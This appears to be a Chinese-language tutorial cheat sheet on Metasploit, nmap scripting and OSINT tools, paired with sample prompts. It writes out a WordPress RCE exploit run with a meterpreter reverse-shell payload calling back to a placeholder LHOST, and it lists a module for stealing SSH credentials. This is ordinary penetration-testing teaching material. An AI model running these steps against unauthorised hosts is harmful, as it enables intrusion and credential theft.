Metasploit 框架
Vibe Prompt
「幫我用 Metasploit 掃描目標主機的開放埠與服務版本。」
基本指令
# 啟動 msfconsole
msfconsole
# 掃描埠
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.0.0.1
msf6 > set PORTS 1-1000
msf6 > run
# 使用漏洞模組
msf6 > use exploit/unix/webapp/wordpress_rce
msf6 > set RHOSTS target.com
msf6 > set PAYLOAD php/meterpreter/reverse_tcp
msf6 > set LHOST your-ip
msf6 > exploit
常用模組
| 模組 | 用途 | |------|------| | scanner/portscan/tcp | TCP 埠掃描 | | scanner/http/wordpress_scanner | WordPress 掃描 | | scanner/ssl/openssl_heartbleed | Heartbleed 檢測 | | exploit/multi/handler | 監聽 reverse shell | | post/multi/gather/ssh_creds | 竊取 SSH 憑證 |
Vibe Prompt
「幫我寫一個 Python 腳本,使用 nmap 掃描目標主機並輸出報告。」
import nmap
import json
nm = nmap.PortScanner()
target = "10.0.0.1"
nm.scan(target, arguments="-sV -sC -O -p 1-1000")
for host in nm.all_hosts():
print(f"\nHost: {host} ({nm[host].hostname()})")
print(f"State: {nm[host].state()}")
print(f"OS: {nm[host].get('osmatch', [{}])[0].get('name', 'Unknown')}")
for proto in nm[host].all_protocols():
ports = nm[host][proto].keys()
for port in sorted(ports):
service = nm[host][proto][port]
print(f" {port}/{proto}: {service['name']} {service['version']} ({service['state']})")
OSINT 資訊收集
| 工具 | 用途 | |------|------| | Recon-ng | Web 資訊收集框架 | | theHarvester | Email、子網域收集 | | Shodan | IoT 設備搜尋 | | Censys | 網路資產地圖 | | Whois | 域名註冊資訊 |